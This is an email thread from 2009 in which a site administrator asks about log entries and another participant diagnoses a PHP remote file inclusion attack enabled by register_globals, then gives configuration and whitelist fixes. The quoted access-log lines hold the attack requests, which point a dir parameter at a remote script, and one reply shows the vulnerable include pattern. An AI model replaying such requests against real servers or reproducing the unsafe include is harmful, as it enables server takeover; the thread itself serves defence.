Thanks, I turned off register_globals and modified the code, and it looks like that will take care of the problem.<br><br><div class="gmail_quote">On Mon, Jun 29, 2009 at 9:09 PM, Brandon Checketts <span dir="ltr">&lt;<a href="mailto:brandon@brandonchecketts.com">brandon@brandonchecketts.com</a>&gt;</span> wrote:<br>
<blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex;">The request to webpage.php that returned a 200 status might or might not<br>
be a problem.  You should examine the PHP script and see if it is doing<br>
anything with the $dir variable without verifying that it is safe to use.<br>
<br>
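For example, the unsafe pattern often looks something like the snippet<br>
below.  This is only a guess at what webpage.php might contain (the<br>
footer.php warning in your error_log suggests it builds an include path<br>
from $dir), so compare it against the real script:<br>
<br>
&lt;?php<br>
// Hypothetical sketch of the unsafe pattern, not your actual webpage.php.<br>
// $dir is never initialized or checked, so with register_globals a request<br>
// like ?dir=http://lpkpm.com/lib/fatal1.txt?? puts that URL straight into<br>
// the include, and PHP downloads and executes the remote file.<br>
include($dir . '/footer.php');<br>
<br>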
This type of vulnerability is common in old PHP code that relies on<br>
register_globals being enabled.  When register_globals is enabled, PHP<br>
automatically turns every parameter passed in a GET or POST request into<br>
a global variable.  Poorly written PHP code will sometimes include()<br>
such a variable blindly, causing the remote page to be downloaded and executed.<br>
<br>
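Assuming that is what is happening, the fix is to stop relying on<br>
register_globals and to validate the value yourself before it reaches an<br>
include().  Roughly along these lines (the directory names below are just<br>
placeholders for whatever your script actually supports):<br>
<br>
; php.ini<br>
register_globals = Off<br>
allow_url_include = Off   ; PHP 5.2+, blocks include() of remote URLs<br>
<br>
# or per directory in .htaccess when running mod_php<br>
php_flag register_globals off<br>
<br>
&lt;?php<br>
// Read the parameter explicitly and only accept values you expect;<br>
// never pass a user-supplied URL or path to include().<br>
$sections = array('members', 'news');<br>
$dir = isset($_GET['dir']) ? $_GET['dir'] : '';<br>
if (in_array($dir, $sections, true)) {<br>
    include dirname(__FILE__) . '/' . $dir . '/footer.php';<br>
} else {<br>
    include dirname(__FILE__) . '/footer.php';<br>
}<br>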
<br>
Thanks,<br>
Brandon Checketts<br>
<div class="im"><br>
<br>
<br>
<br>
Ben Alexander wrote:<br>
&gt; Every now and then some IP address from Asia or elsewhere hits our web<br>
&gt; server and exploits what seems to be a PHP or mod_rewrite bug to proxy<br>
&gt; itself to another website, using a lot of bandwidth, though it seems to<br>
&gt; be only our outgoing bandwidth.<br>
&gt;<br>
&gt; Here is an example of this from the access_log (members.php is not a valid<br>
&gt; PHP page on the site):<br>
&gt;<br>
&gt; 80.93.50.112 - - [27/Jun/2009:01:35:37 -0400] &quot;GET<br>
&gt; //members.php?act=view&amp;p=passwd&amp;dir=<a href="http://lpkpm.com/lib/fatal1.txt??" target="_blank">http://lpkpm.com/lib/fatal1.txt??</a>??<br>
&gt; HTTP/1.1&quot; 404 16942 &quot;-&quot; &quot;Mozilla/5.0&quot; &quot;-&quot;<br>
&gt; 80.93.50.112 - - [27/Jun/2009:01:35:39 -0400] &quot;GET<br>
&gt; /webpage.php//members.php?act=view&amp;p=passwd&amp;dir=<a href="http://lpkpm.com/lib/fatal1.txt??" target="_blank">http://lpkpm.com/lib/fatal1.txt??</a>??<br>
&gt; HTTP/1.1&quot; 200 210484729 &quot;-&quot; &quot;Mozilla/5.0&quot; &quot;-&quot;<br>
&gt;<br>
&gt; When this happens, there are hundreds of megs of log lines like this in<br>
&gt; error_log:<br>
&gt;<br>
&gt; [Sat Jun 27 01:35:39 2009] [error] [client 80.93.50.112] PHP Warning:<br>
&gt;  virtual() [&lt;a href=&#39;function.virtual&#39;&gt;function.virtual&lt;/a&gt;]: Unable to<br>
&gt; include &#39;footer.php&#39; - error finding URI in<br>
</div>&gt; /htdocs/website.com/webpage.php on line 93<br>
<div class="im">&gt;<br>
&gt; [Sat Jun 27 01:35:39 2009] [error] [client 80.93.50.112] Request<br>
&gt; exceeded the limit of 10 subrequest nesting levels due to probable<br>
&gt; configuration error. Use &#39;LimitInternalRecursion&#39; to increase the limit<br>
&gt; if necessary. Use &#39;LogLevel debug&#39; to get a backtrace.<br>
&gt;<br>
&gt;<br>
&gt; Any idea how to prevent this?<br></div></blockquote></div>